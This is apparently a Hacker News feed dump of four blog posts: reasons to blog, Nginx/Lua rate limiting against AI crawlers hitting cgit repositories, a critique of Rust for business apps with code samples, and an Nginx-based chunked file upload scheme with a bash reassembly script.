    So you're thinking about starting a blog, or maybe dusting off that forgotten corner of the internet you call your own. But the thought "Why bother? Nobody reads it anyway" keeps creeping in. I'm here to tell you that's the wrong question altogether. Forget about views, forget about going viral. Here are my few reasons why you need to blog more, even if your audience consists of you, your mom, and a few curious bots:

    Establish Credibility (Beyond Just Expertise)

A blog is a low-cost, high-impact way to demonstrate knowledge in your field. Referrals based on something someone read from you are a solid basis for credibility.

    Solidify Your Understanding

The act of writing forces you to organize your thoughts, sharpen your perspective, and connect the dots in a way that simply thinking about a topic never could. You are, in effect, forced to clarify your point of view.

    Future You Will Thank You

    Your blog becomes your own personal knowledge base, a readily accessible repository of solutions, insights, and processes you can revisit time and time again.

    Level Up Your Communication Skills

Practicing writing regularly makes you a better communicator in all areas of your life, from concise emails to well-articulated presentations. Writing in public is also practice for communicating in any public setting.

    A Timestamped Record of Your Growth

A blog lets you document your career as it happens: a timestamped log of experience that serves as proof of your growth and credibility.

    Stand Apart from the AI Slop

Anyone can generate content with AI, but blog posts from 2023 and before are undeniable proof of human authorship. People will also actually read your blog when you include it in a resume.

Complete Side Projects by Documenting Them

Documenting a side project gives it a conclusion. The blog post is the finish line you are working towards in your hobby.

    Get It Out of Your Head

Just like therapy, writing gets ideas out of your head, and publishing lets you see whether people share your opinion. The chance that someone might read it becomes external motivation, which pushes you towards more detailed writing.

    To Improve and Take Control of Yourself

Blogging is like meditation: it is primarily good for yourself, not something others necessarily get value from. It's also a good way to develop and express your own opinion on an Internet where everything is an echo chamber.

    ]]>
    https://igorstechnoclub.com/why-you-need-to-blog-more-even-if-nobody-reads-it/ hacker-news-small-sites-43223845 Sat, 01 Mar 2025 21:27:09 GMT
    <![CDATA['AI' Crawlers Hammering Git Repos Across the Web – A Rate Limiting Approach]]> thread link) | @allures
    March 1, 2025 | https://blog.sysopscafe.com/posts/ai-crawlers-hammering-git-repos/ | archive.org

    TLDR

    AI-powered crawlers were aggressively scraping our Git repositories, causing server overload. We initially scaled up but later implemented fine-tuned Nginx rate limiting using Lua. The solution drastically reduced load while keeping the web frontend fully accessible.

    If you host a public code repository on the web, you’ve likely faced issues in recent months. AI-powered crawlers are aggressively scraping public repositories, collecting any code they can access. This growing concern has sparked discussions across the tech community. For reference, see this Hacker News thread and this blog post.

    I help maintain some large open-source Git repositories and encountered this issue as well. After spending a lot of time tweaking robots.txt, applying rate limits per IP, and even blocking entire IP ranges from certain ASNs, the crawlers kept hammering the servers, causing excessive load. We use cgit to host large code repositories, and despite caching layers like Varnish and cgit’s internal cache, it wasn’t enough. Some operations are inherently resource-intensive, and the relentless requests from these crawlers were consuming all available system resources.

    Note: We don’t use a WAF system or any CAPTCHA for our services. We prefer to keep things simple, without external systems hooked into our users’ browsers, relying only on open-source tools.

    After reviewing 24 hours of logs, here’s what we found:

    • ~145k requests
    • ~140k unique IP addresses (IPv4 and IPv6)

    A simple rate limit per IP address is ineffective in this case, as they rotate through a vast pool of IPs to evade traditional blocks and limits.

    From the sampled data, the IP addresses belonged to telecom providers worldwide. This suggests that these crawlers are using residential proxies for their scraping. Unfortunately, many companies offer this service, making it even harder to block them effectively.

    Deploy More Servers! 🚀

    Since we use gdnsd in our infrastructure, launching additional servers to distribute the load globally was straightforward.

    We deployed five additional high-performance servers, ranging from 96 to 48 threads, ensuring cgit had more CPU resources and processes to handle the load efficiently.

    It worked for a few weeks. The servers handled a high load, but we were able to serve users without issues—until the crawlers ramped up their request rates again.

    cgit-last-graph-before

    Note: At this point, we gained another insight—most of the crawlers were coming from South America, Europe, and Asia, while servers in the United States were running smoothly.

    After analyzing the logs again, we identified that the most frequently requested URIs by crawlers were:

    /$repo/(log|plain)/XXXYYY?id=<commit-hash>

    Regular users frequently access /log, and sometimes /plain, but requests to /log or /plain with a specific commit hash are far less common. This led us to the idea of applying rate limiting specifically when a commit hash is included in the request.

    To implement a more complex rate limit that applies only to specific requests, we needed to use access_by_lua_block. This allowed us to apply custom logic based on Nginx location directives with specific parameters, ensuring that only targeted requests were affected.

    However, to use this feature, Lua support must be enabled in Nginx, either by compiling it with the lua-nginx-module or using a pre-built package that includes Lua support.

    The Rate Limit

    limit_conn_status 429;
    limit_req_status 429;
    limit_req_zone $host zone=source_perserver:10m rate=20r/m;
    
    server {
      [...]

    It’s not a rate limit of twenty requests per minute per IP address, but rather per virtual host or hostname that users are accessing.

    location ~ ^/repo-name/(log|plain)/ {
    
      access_by_lua_block {
        local args = ngx.req.get_uri_args()
        if args["id"] then
          --ngx.log(ngx.ERR, "Debug - Redirecting to /limit-aggressive for rate limiting: " .. ngx.var.request_uri)
          return ngx.exec("/limit-aggressive")
        end
      }
    
      # Continue routing regular users through Varnish
      proxy_pass  http://varnish;
      proxy_redirect default;
    }
    
    location /limit-aggressive {
        limit_req zone=source_perserver burst=20;
        proxy_pass  http://varnish;
        proxy_redirect default;
    }

    And then, the load instantly decreased, as shown in the following graph.

    cgit-last-graph-after

    Most importantly, users can still access the web frontend for the Git repositories without any issues.

    To see the rate limiting in action, use tail on the logs and look for 429 responses.
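For example (a sketch; the log path depends on your setup):

    $ tail -f /var/log/nginx/access.log | grep ' 429 '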

    Final Thoughts

    To the ‘AI’ crawlers out there—whatever you may be—please teach your systems to use git clone when discovering a repository. It’s a simpler and more efficient approach for everyone. [insert khabi meme here]

    – dbaio


    ]]>
    https://blog.sysopscafe.com/posts/ai-crawlers-hammering-git-repos/ hacker-news-small-sites-43223325 Sat, 01 Mar 2025 20:28:15 GMT
    <![CDATA[Is Rust a good fit for business apps?]]> thread link) | @psxuaw
    March 1, 2025 | https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ | archive.org

While you may hear a lot of harsh words about Rust in this rant, that doesn't have to mean it's a bad language. Rephrasing the classic: there are two types of programming languages: ones that people complain about and ones that nobody uses. I started my journey with Rust in 2018 and I've been working in it full time since 2021.

I love Rust a lot for many things: good std lib abstractions, ergonomics (to some extent), the best build toolchain in the world (I've tried many things, but cargo is easily number one across the programming-language landscape). But mostly I love how it brought sanity into systems programming and gave a viable alternative to that hollow abomination called C++ (and CMAKE).

But what do I mean by the term business apps? Nowadays, it's all sorts of services targeting various kinds of user/asset management, be it a bank portal, an online shop or any other sort of ERP system. This also covers ETL to a huge extent, as such workloads pull your focus away from the concerns that Rust shines in.

    These systems usually have similar shell: a web service providing some API, a database to manage system information and all sorts of other service connectors.

These systems are characteristic because their main complexity comes from the domain: it is not hardware/software related, but about modelling the complexities of human interactions in code. Quite often the most performance-sensitive parts relate to I/O (databases, HTTP communication) and serialization, and are solved by tuning access to the other services we use, not the algorithms we write ourselves.

These systems have famously been written in many different languages, from Python/Ruby/JavaScript/PHP to Java/C#/Go. The question is: are business apps a good use case for Rust?

Spoilers: in my opinion, no. Now let's explain why.

    Standard library

One of the nice things about Rust is that the abstractions defined in its standard library feel right in size and scope. On the other hand, the std lib itself is woefully lacking: no RNG, cryptography or serialization. Even some things that should have been language features since day one - like async traits and yield generators - are supplied as 3rd-party macros.

On the other hand, the Rust package ecosystem is enormous. You have everything, from a universal file-system abstraction with dozens of services supported, down to a cross-platform Bluetooth driver that you can use to (literally) connect to your butt plug.

While languages such as Go enable you to write pretty much an entire HTTP service from the standard lib alone, this bazaar-style package management comes with a burden: whenever you need to solve any mundane problem, you land in a space where everything has at least 7 different crates available, but half of them are actually toy projects and most of them have not been maintained for the last 5 years. And don't get me started on the audits needed to check whether one of the 600 dependencies of your hello world app will be used for supply chain attacks.

It takes time and attention to sift the wheat from the chaff. Attention that is limited and could be put to better use elsewhere.

And while many of these concerns make sense in systems programming, since it covers very different environments with slim-tailored constraints - like WASM in the browser, or embedded devices where even Rust's minimal standard lib is too much - they don't matter so much in the context of business apps, where solid defaults for common problems are desired: which is one of the reasons for Go and .NET popularity in this domain.

    Not abstract enough

One of the fantastic parts of Rust is that it managed to - mostly - live up to the credo of zero-cost abstractions: a situation where the performance of your highly abstracted code (i.e. iterator ops or futures) is basically the same as its hand-rolled equivalent.

The problem is that Rust comes with some new concepts, like lifetimes and mutability modifiers, which cannot be abstracted over to the same degree as regular generics.

If you've played with Rust, you have probably already seen those different kinds of iterators for mutable/immutable references, which basically have the same implementation but require twice the boilerplate code. The reason is that mutability is not a generic property in Rust and cannot be abstracted over.

Some languages like Pony offer the ability to control read/write access to fields and variables, but do it in a way that enables safe "casting" between them. PS: I highly recommend learning Pony for its reference-capabilities concept alone, which may initially seem more complex than Rust's mutability and borrow-checker, but in practice is much more robust and avoids many pitfalls that Rust has, especially in multi-threaded programming.

    Dynamic trait references

Since this rant has already come to the topic of abstractions, let's talk about dyn Trait. First, let me praise Rust's decision to explicitly mark, in code, the references responsible for virtual-table dispatch.

    However Rust also decided to turn Box<dyn Trait>/Arc<dyn Trait> into fat pointers (similar to Go, and opposite to Java/.NET).

Short explanation: unlike Box<T>, which is basically a memory pointer, the memory representation of Box<dyn T> is two pointers - one for the type's virtual table, and one for the heap address where the corresponding object lives. This comes with a few consequences:

• If you're working with the C foreign function interface, there's no right C primitive to support you. You need to roll out something of your own, which most likely won't be compatible with existing solutions. A bizarre design decision, given how important native interop is for Rust.
• If you want to introduce lock-free mutability via a Compare-And-Swap API (like the one that arc-swap offers) and use dynamics at the same time... well, get fucked. You'll need an extra layer of indirection, since this API is only available for pointer-sized things.
• Some of the Rust APIs restrict you to working with Sized data - types whose size can be determined at compile time - which unfortunately puts limitations on your generic params, e.g. if you ever want to use them in a Box<T> context (since the box pointer will have a different size depending on what T is).

Rust provides a workaround in the form of dedicated crates that offer thin dynamic pointers, but since they are not part of the standard lib, it's unlikely that you'll be able to use them across different libraries in the ecosystem without extra work.

    Borrow checker: early adopter syndrome

One of the biggest value propositions of Rust is the borrow checker. If you ever wanted a reason to learn Rust, the borrow-checker and ownership model is it. It changes the way you think about object graphs.

Rust is probably the first non-esoteric language that adopted a borrow-checker as a regular tool. However, it comes with some drawbacks: at its current stage the borrow-checker is still not very advanced and extremely conservative, requiring the programmer to do a lot of defensive programming and workarounds to make it happy. And most likely it will never be improved beyond minor points, as that would require a breaking change.

In short: you can imagine the borrow-checker as a recursive read/write lock enforced on all fields and variables at compile time - at any time you can have multiple read-only references to the same object or one read-write reference, but never a mix of the two. Additionally, in order to hold a reference of a given kind to a field in an object graph, you need to hold the same (immutable/mutable) or a stronger (mutable) reference to its parent.

If we think in the category of locks, you can imagine a deadlock problem: A needs to wait for B, and B needs to wait for A, to acquire their corresponding locks. In Rust's borrow-checker, such situations are compile errors. The same logic is used by Rust to operate on actual locks, but don't worry: it doesn't mean that Rust is a deadlock-free language.

What it means, however, is that there's no easy way to represent cyclic data structures in Rust (here's a description of the famous doubly-linked list problem), since - unlike pretty much any other language - it explicitly disallows you from holding two mutable/immutable references to the same variable (even in the same thread).

And speaking of cyclic data structures: you can actually sometimes implement them in a straightforward manner with Rc<RefCell<T>>/Arc<Mutex<T>>, but the problems are that:

1. RefCells can easily blow up, since they work the same way as the borrow-checker but at runtime, while a Mutex can deadlock at runtime. Neither of them is "zero cost".
2. You need to keep track of references with strong and weak pointers (see the sketch below), which is usually not an issue unless your object graph needs to be a bit more complicated for some reason. If you don't, you'll get a memory leak. One of Rust's promises was to reduce these, but it only holds in comparison to traditional "systems" languages like C/C++; the comparison falls apart against managed languages.
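For reference, a minimal sketch of the strong/weak split (the types are hypothetical): the Weak back-edge breaks the ownership cycle, so dropping the parent frees both nodes.

    use std::cell::RefCell;
    use std::rc::{Rc, Weak};

    struct Node {
        parent: RefCell<Weak<Node>>,       // weak back-pointer: doesn't keep the parent alive
        children: RefCell<Vec<Rc<Node>>>,  // strong pointers own the children
    }

    fn main() {
        let parent = Rc::new(Node {
            parent: RefCell::new(Weak::new()),
            children: RefCell::new(vec![]),
        });
        let child = Rc::new(Node {
            parent: RefCell::new(Rc::downgrade(&parent)),
            children: RefCell::new(vec![]),
        });
        parent.children.borrow_mut().push(child);
        // when `parent` goes out of scope, both nodes are freed:
        // the Weak edge doesn't count towards the strong refcount
    }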

I get why it's there, but forcing it blindly and everywhere as the default behaviour is fucking bullshit: which is apparently acknowledged by the authors themselves, since the common way of getting two independent mutable references into an array is to split it into two separate slices using a method (split_at_mut) that operates on unsafe pointers under the hood. Shout-out to all the haters saying that unsafe Rust is not idiomatic: it's not only idiomatic, it's necessary.

    Borrow checker and encapsulation

Another thing about the borrow checker is that it has a very shallow understanding of your code. It explicitly makes the conservative assumption that if you call a method on some reference, the method may access ALL fields of that reference, forcing any borrow of an individual field taken outside of it to be invalidated.

    Let's check this out on a following example:

    struct X {
        commit_offset: usize,
        entries: HashMap<u32, Vec<Entry>>,
        changed: HashMap<u32, Vec<usize>>,
    }
    
    impl X {
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.entries.get_mut(client) {
                // get iterator over uncommitted entries for given client
                for e in entries.as_mut_slice()[self.commit_offset..].iter_mut() {
                    if f(e) {
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

Now let's try to encapsulate it a little to make it more readable - nothing much, just extract our cryptic iterator statement to give it some context:

    impl X {
    	/// get iterator over uncommitted entries for given client
        fn get_uncommitted(&mut self, client: &u32) -> Option<&mut [Entry]> {
            let e = self.entries.get_mut(client)?;
            Some(&mut e.as_mut_slice()[self.commit_offset..])
        }
        
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.get_uncommitted(client) {
                for e in entries.iter_mut() {
                    if f(e) {
                    // compilation failure: get_uncommitted has already
                    // borrowed `&mut self` for the scope of the `if let`,
                    // so we cannot access `self.changed` here
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

The second implementation will fail. Not because it's wrong, not because we broke something (in fact these two implementations are identical), but because it makes the borrow checker sad.

This is in fact a recurring theme: when working in Rust, you'll often find yourself in a situation where you need to split your types or methods in a specific way, just because the borrow checker says so. It's mandatory, even when it adds no value to your project (or straight up removes it).
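One common workaround - a sketch, not the only option - is to make the helper borrow only the fields it actually touches, so the compiler can see that entries and changed never alias (X and Entry as in the example above):

    impl X {
        /// Same helper, but borrowing disjoint fields explicitly
        /// instead of taking `&mut self`.
        fn get_uncommitted<'a>(
            entries: &'a mut HashMap<u32, Vec<Entry>>,
            commit_offset: usize,
            client: &u32,
        ) -> Option<&'a mut [Entry]> {
            let e = entries.get_mut(client)?;
            Some(&mut e.as_mut_slice()[commit_offset..])
        }
    }

Calling X::get_uncommitted(&mut self.entries, self.commit_offset, client) then leaves self.changed free to borrow - at the cost of a helper that no longer reads like a method.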

    Performance ceiling vs time to performance

One of the common misconceptions about Rust is that apps written in Rust are fast simply because they are written in Rust. This is true to some extent if we compare them against dynamic languages like Python, Ruby or JavaScript, but it falls short when we start comparing against services written in e.g. Go, Java or .NET.

This may be due to an oversimplified view of the performance characteristics of real-world apps:

1. Winning hyper-optimization wars in micro-benchmarks rarely translates to visible results in business apps, where our own code is usually ~10% of the overall execution: the rest is databases, web stacks, serializers etc.
2. For those apps, most of the optimization comes from proper database and network usage, system architecture and the right algorithm choice. Language wrestling matters a lot less, at least when we talk about languages in the same performance "weight class".

Moreover, picking Rust may cause a let-down in performance expectations - I've seen people writing their apps in both Rust and e.g. C# and noticing that their C# apps were actually faster. This comes from another issue: on your first try, you'll probably write your Rust app just well enough to make it compile, do the actual task and avoid glaring performance issues. Most likely you'll stick to the defaults, and - in a business setting - that will be the last time you try to optimise that piece of code.

    This boils down to the difference between:

• Performance ceiling, which means how fast a program written in a given language can possibly be. This is usually low for dynamic languages (since they abstract a lot), but it's very high for Rust. However, on some platforms, e.g. .NET or Swift, where we can choose to work closer to the metal if we want to, this difference is not that significant.
• Time to performance, which basically means: "how long does it take to solve a problem with acceptable performance". And personally: Rust falls behind many managed languages on that metric, mainly because of things like the borrow checker and the multi-threading issues I cover later.

Your business app will probably be working with things like strings, byte buffers and object graphs to carry business data between the DB and the web framework. This means it will move and copy a lot of data around: something that the default Rust primitives are not particularly great at, e.g. String::clone in Rust does a deep copy (where in managed languages it's just a pointer copy), while String itself is just a wrapper around a capacity-bound Vec<u8>, which means strings may also be bigger than they need to be.
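For illustration, a small sketch of that trade-off, with Arc<str> as one common mitigation for clone-heavy string passing (a sketch, not a universal recommendation):

    use std::sync::Arc;

    fn main() {
        let s = String::from("some business payload");
        let s2 = s.clone();   // deep copy: allocates and memcpys the bytes

        let a: Arc<str> = Arc::from("some business payload");
        let a2 = a.clone();   // shallow: just an atomic refcount increment
        println!("{s2} {a2}");
    }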

Copying "references" can be much more expensive than in languages with managed memory, because of reference counting: e.g. copying a Vec<Arc<T>> means not only a memcpy over the vector's heap space but also incrementing the ref counter of every nested Arc pointer (including loading each of them from the heap into a register and coordinating the new counter values between CPU caches).

And since we're at Arc/Rc or even Box: once you need to deal with graphs of objects or move data between coroutines or threads, you'll find yourself using them quite a lot. The problem is that this allocation technique is nowhere near as fast as the bump-pointer allocators that managed languages use. The actual win comes when we need to release memory, which in Rust doesn't introduce GC pauses. However, modern runtimes, e.g. Go or Java's Z collector, can provide constrained GC pauses that keep latency in check and avoid pathological cases (which is fine for most business apps, except maybe the HFT space). Moreover, they can offload memory release to background threads, which is not the case in Rust and, for big object graphs, can also affect latency.

And while technically Rust's memory footprint would be expected to be lower, in practice that doesn't have to be the case (because of all the deep copying of heap objects, and the fact that many of Rust's pointers are pinned in place, causing fragmentation).

    Rust is NOT good for multi-threaded apps

Some developers like to claim that - thanks to its strict borrow checker - Rust makes multi-threaded programming safe and reliable. This statement could probably hold in comparison against languages like C/C++, but once again it easily falls apart when you compare it against any of the contenders we've already described.

    .await pain

The first problem is: building multi-threaded apps in Rust is simply painful. Two thirds of this pain comes from the fact that if you ever have to do it, you'll most probably be put to work with async/await and the tokio runtime.

Once you need to work with Rust futures and async code, you'll be exposed to a whole new world of micro-complexities dosed into your brain, e.g.:

• How you cannot just access objects and their fields, but have to work with pinning and Unpin.
• How to build async iterators: while async_stream is there, from time to time you'll have to roll something by hand, and it's a much harder process than in any other language supporting this feature that I know of.
• Differences between regular threads/locks and their asynchronous equivalents.
• Why the hell you need async_trait and why it's even configurable.
• How Send and Sync make each of the issues above exponentially harder than it already is.
• And how the fact that you have pluggable runtimes - and sometimes need to use more than one in your app, e.g. tokio + rayon - makes things even more interesting.

    I think that this blog post is a good critique of current state of async Rust.

If you're going to pass your objects across threads, Rust forces some constraints on the code you're writing - such as the Send + 'static bounds - even if that code is executed in only a single execution scope at a time. The problem is that in tokio - the dominant runtime in the Rust ecosystem - the primary way of parallelizing work is the spawn method, which uses a work-stealing scheduler that moves suspended executions from busy to idle threads as it sees fit. This usually requires ensuring that most of your async code base is Send + 'static compatible.

What's nice about the Send and Sync traits is that they are inferred from the bodies of the async methods you implement. What's not nice is that they are not immediately visible, so you may accidentally break API guarantees by changing a few lines somewhere down a method call stack without even noticing, resulting in your methods no longer being forkable via tokio::spawn (see the sketch below).
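A minimal sketch of how this happens (the function names are hypothetical): holding a !Send value across an .await point makes the whole generated future !Send, a few frames away from where anyone is looking.

    use std::rc::Rc;

    async fn some_io() { /* e.g. a DB or HTTP call */ }

    async fn handler() {
        let cached = Rc::new(42);  // Rc is !Send
        some_io().await;           // `cached` is alive across the .await point...
        println!("{cached}");      // ...so the generated future is now !Send,
    }                              // and tokio::spawn(handler()) stops compiling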

    Locks. Locks everywhere.

In practice, all of the Send + 'static constraints mentioned above mean that all kinds of shared data now need to be wrapped in Arc<Mutex<T>>/Arc<RwLock<T>>. But which mutexes and locks are we talking about?

• Since std::sync::RwLock is basically a wrapper around OS primitives, it is very heavy. Most notably, it doesn't offer an async/await API, so it's going to block threads from the tokio thread pool, which is damaging for server performance.
• parking_lot::RwLocks are much more lightweight, since they use optimistic locking with atomic counters. They still don't offer an async/await API though, potentially blocking the thread pool in the process.
• futures_locks::RwLock sounds like a good idea if you aim to have runtime-agnostic async locks, until you look into the implementation and realize that it's just bait and the whole thing is using regular locks inside.
• Tokio has its own RwLock, which offers an async/await API but comes with some caveats, like:
  • If you use its blocking lock methods in a context where the tokio runtime is available, it will straight up panic, crashing your app. And sometimes you just have to call it in a context where the runtime is available but your code cannot be async, calling for another layer of workarounds.
  • It doesn't offer reentrancy or upgradeable locks (promoting read locks into write ones).
• Finally, async_lock::RwLock, which offers an async/await API, an optimal implementation and lock upgrades, and doesn't crash your server because the author didn't like the way you're using his library. PS: don't worry, I don't like it either, but I'm here to do what I can with what I have at hand, not to write poetry.

So once you finally get your PhD in Rust lock algorithms, you're at the level where you can do the job as efficiently as a Go dev after learning the whole language in 2 hours. And god forbid you ask yourself the question: why do I need to use locks at all if this code is never accessed concurrently?

The best part is that - unlike e.g. Pony - the Rust compiler doesn't guarantee the absence of deadlocks in your code. Even better: since locks are so widespread, they are even more likely to occur. It doesn't even have to happen because you're using them wrong, but simply because you didn't know that the code you're calling is using them somewhere below (sending changes over a tokio::watch channel is a great example of that).

    Actors

One of the stunning issues I've found in Rust is that, given how well borrow-checker ownership matches the actor model, the actor libraries in Rust are lacking. I'm not talking about all of them, since I had neither the time nor the energy to check out every one of the 47 actor libraries listed for a good start, but that number strongly suggests a syndrome where, after the first few, every new attempt tried to solve some issue in an existing implementation, creating new ones in the process. If you're using one for your business app, most likely it will be one of the 3 most popular, and most likely it will be actix, because you've been baited by its popularity and the pretty mature web framework attached to it.

The problem with Actix is that its core was defined before the era of async/await Rust. This means that it doesn't natively support async actor methods - and if you need a server app doing any kind of I/O, you WILL have to use async Rust eventually. Eventually some support for async was added, but now you need to educate yourself on which of the 4 different response types that support futures should be used in which situation. AFAIK none of them supports using the &mut self actor in an async method (and we don't count actix_async_handler, since it has a list of limitations longer than the actual documentation). It's about as handy as a knife with 4 different blades but no handle.

In practice, the most popular pattern I've seen was simply using a tokio channel combined with tokio::spawn, which is essentially a stripped-down cousin of an actor: more verbose and missing all of its benefits, like structured message handling, lifecycle management, state encapsulation, parent-children hierarchies etc.

    Panics

While Rust errors are pretty safe - thanks to being part of the method declaration - they are not alone: panics are still there. And unlike errors, you'll never be 100% sure that you've avoided all of them. Technically there could have been some way to signal their existence, e.g. via unsafe-style brackets or something, but in practice it's hard to be sure.

One of the issues is the ever-present .unwrap calls. Technically they are meant to be used with caution, but if you're glossing over a code base, the only difference between hash_map.get().unwrap() (which can blow up often) and path_buf.to_str().unwrap() (which will most likely never blow up in your app) is your experience.

    Other issues include:

• Panics on index accesses.
• Panics on double borrow/borrow_mut from RefCells - patterns which are perfectly fine in many languages but in Rust will crash your entire app, because the borrow checker doesn't like second guesses.
• Panics with stack overflows, because the state machines generated by your async methods may be a "bit" bigger than expected: but at least no code has been heap-alloc'ed while solving this problem.

What's important to notice here: we're talking about panics that will crash your server, affecting not just the current request handler but everyone using your services. That's the major difference between Rust failures and the exceptions used in managed languages. And sure, you could say these can be fixed with proper programmer discipline, but isn't the Rust promise of the compiler taking care of dangerous coding mistakes the reason we put in the effort to learn it and deal with all of the borrow-checker bullshit along the way?

    Death by a thousand cuts

Individually, the issues above can often be solved with some experience, and cast off as a "skill issue". But together they build up into a developer's mental fatigue: you're here to solve business problems, yet at every step you need to solve "plumbing issues" and make decisions about the memory model, including the feature changes and refactoring they'll require in the future. Each one of them is considered crucial by the borrow checker, to the point where it either causes a compilation error or a runtime panic.

There are places where fine-grained control over program memory and performance tuning is beneficial and can be one of the business goals: these are things from the broad area of systems engineering. However, for your daily ERP app, the complexity coming from trying to reflect real-life interactions, with all their exceptions and imprecision, is enough: you're not going to be praised because your asset management app takes 10% less CPU while the task backlog has doubled in the meantime.

So if you're a founder or developer wondering whether to use Rust for your next business project because some crypto start-up is developing their quasi-bank in it and it would look nice on your resume, please think twice, and don't make a regrettable decision for yourself and your colleagues.

    ]]>
    https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ hacker-news-small-sites-43223093 Sat, 01 Mar 2025 20:04:29 GMT
    <![CDATA[Nginx Explorer – Upload]]> thread link) | @todsacerdoti
    March 1, 2025 | https://blog.izissise.net/posts/ngxp-upload/ | archive.org

    After listing files and setting up per directory accesses, we would like to allow some users to upload files.

This solution is very hacky, but it has the advantage of requiring only a standard nginx server and a bit of JavaScript.

    First, we define our upload endpoint:

    ...
    server {
        ...
        location ^~ /___ngxp/upload/ {
            limit_except GET POST     { deny all; }
            if ($user_authorized = 0) { return 401; }  
    
            client_body_temp_path      /home/user/uploads/; 
            client_body_in_file_only   on; 
            client_body_buffer_size    16m;
            client_max_body_size       256m;
            client_body_timeout        2h;
            proxy_set_body             off; 
            proxy_set_header           X-fileno "$upload_fileno"; 
            proxy_pass                 http://[::1]:4000/$request_method;
        }
    }
    
    map $request_body_file $upload_fileno { 
        ~([^\/]*)$ $1; 
        default    "";
    }
    

    client_body_temp_path will store request bodies at the specified path on the file system. However, nginx will actually do so only if there is a proxy_pass defined.

    To work around this, we define another server that listens only on localhost. With proxy_set_body off;, the body will not actually be sent to the proxy.

    server {
        listen [::1]:4000;
        location /POST { return 201 "$http_x_fileno"; }
        location /GET  { return 200 "ngxp upload"; }
    }
    

Nginx will create an ever-incrementing numbered file for every request body; the increment is not predictable, thanks to nginx's true randomness.

To upload files larger than client_max_body_size and preserve the original filename for the administrator, we'll have to write some client-side code.

Using JavaScript, we can upload a file with an XHR request and split the file into chunks. Conveniently, browser File objects have a slice function.

    We also send a meta file to allow the server operator to reconstruct the file from its chunks. This file includes metadata such as a magic header, chunk size, chunk count, the size of the last chunk and the filename of each chunk on the server as sent back by nginx (X-fileno).
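The meta_info helper itself isn't shown in this post; a hypothetical sketch, consistent with the 16-byte marker and the jq filters in the reassembly script below, could look like this:

    // Hypothetical sketch of the meta_info helper (not shown in the post):
    // one marker line, then one line of JSON with the fields the
    // reassembly script's jq filters expect.
    function meta_info(f, chunk_cnt, chunk_size, chunk_last_size, chunk_fileno) {
        var json = JSON.stringify({
            name: f.name,                      // original filename
            chunk_cnt: chunk_cnt,              // number of chunks
            chunk_size: chunk_size,            // size of a full chunk
            chunk_last_size: chunk_last_size,  // size of the trailing chunk (0 if none)
            chunk_fileno: chunk_fileno,        // filenames returned by nginx (X-fileno)
        });
        return new Blob(["#ngxpupload_meta\n" + json + "\n"]);
    }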

    
Array.from(files).forEach((f) => {
    var seeker = 0; // current read offset into the file
        var chunk_cnt = 1;
        var chunk_size = f.size;
        var chunk_last_size = 0;
        if (upload_max_size > 0 && f.size > upload_max_size) {
    
            chunk_cnt = f.size / upload_max_size | 0;
            chunk_size = upload_max_size;
            chunk_last_size = f.size % upload_max_size | 0;
            if (chunk_last_size > 0) {
                chunk_cnt += 1;
            }
        }
        var promise_chain = Promise.resolve(([null, []]));
        for (var i = 0; i < chunk_cnt; i++) {
            var chsz = chunk_size;
            if ((seeker + chsz) > f.size) {
                chsz = chunk_last_size;
            }
            let chunk = f.slice(seeker, seeker + chsz); 
            seeker += chsz;
            promise_chain = promise_chain.then(([xhr, chunk_fileno]) => {
                if (xhr !== null) {
                    chunk_fileno.push(xhr.responseText);
                }
                return upload(upload_endpoint, chunk, chunk_fileno);
            });
        }
    
        return promise_chain.then(([xhr, chunk_fileno]) => {
            if (xhr !== null) {
                chunk_fileno.push(xhr.responseText);
            }
            var meta = meta_info(f, chunk_cnt, chunk_size, chunk_last_size, chunk_fileno);
            return upload_func(
                upload_endpoint, meta, chunk_fileno
            );
        }).then(upload_success, upload_error);
    });
    

    With the promise_chain, each chunk of the file will be uploaded one after the other!
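The upload / upload_func helpers aren't shown either; a minimal hypothetical sketch that matches the chain above (nginx answers 201 with the X-fileno of the stored body as the response text):

    // Hypothetical sketch: POST one chunk via XHR and resolve with the xhr
    // plus the list of filenos accumulated so far.
    function upload(endpoint, blob, chunk_fileno) {
        return new Promise(function (resolve, reject) {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", endpoint);
            xhr.onload = function () {
                if (xhr.status === 201) resolve([xhr, chunk_fileno]);
                else reject(xhr);
            };
            xhr.onerror = function () { reject(xhr); };
            xhr.send(blob);
        });
    }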

    The chunks will be waiting until they are reassembled.

Once a file is uploaded, we're left with numbered files in the previously specified directory.

We can reconstruct the original files by searching for all files that start with the marker value #ngxpupload_meta. With each meta file, we find all chunks of the corresponding file and concatenate them into a file named $name. Finally, we remove the used chunks.

    find "$1" -type f | while read -r h; do
    if [ ! -f "$h" ]; then continue; fi
    read -r -n 16 head < "$h" || true
    if [ "$head" != "#ngxpupload_meta" ]; then continue; fi
    IFS='/' read -r name chk_cnt chk_sz chk_lsz < <(
        jq -Rr 'fromjson? | [(.name | sub("/";"_";"g")), (.chunk_cnt|tonumber), (.chunk_size|tonumber), (.chunk_last_size|tonumber)] | join("/")' "$h"
    )
    eval "chk_fileno=( $( jq -Rr --arg d "$1" 'fromjson? | .chunk_fileno[] | select(test("^[0-9]*$")) | "\($d)\(.)" | @sh' "$h" ) )"
        stats=$(stat -c '%n %s' "$h" "${chk_fileno[@]}" | sort | uniq -f1 -c)
        stats=${stats% [0-9]*}
        stats=${stats// }
        stats=${stats//$'\n'}
        expected="$(( chk_cnt - ( chk_lsz > 0 ) ))${chk_fileno[0]}${chk_sz}"
        if (( chk_lsz > 0 )); then
            expected+="1${chk_fileno[-1]}${chk_lsz}"
        fi
        [ "$stats" = "${expected}1${h}" ] || { echo "$h meta invalid" >&2; break; }
        cat "${chk_fileno[@]}" > "$name"
        rm -f "$h" "${chk_fileno[@]}"
    done
    

    That's the gist of how nginx explorer uploads work!

There are a lot of other cool features in the UI part that I haven't written about yet, and some I've yet to implement.

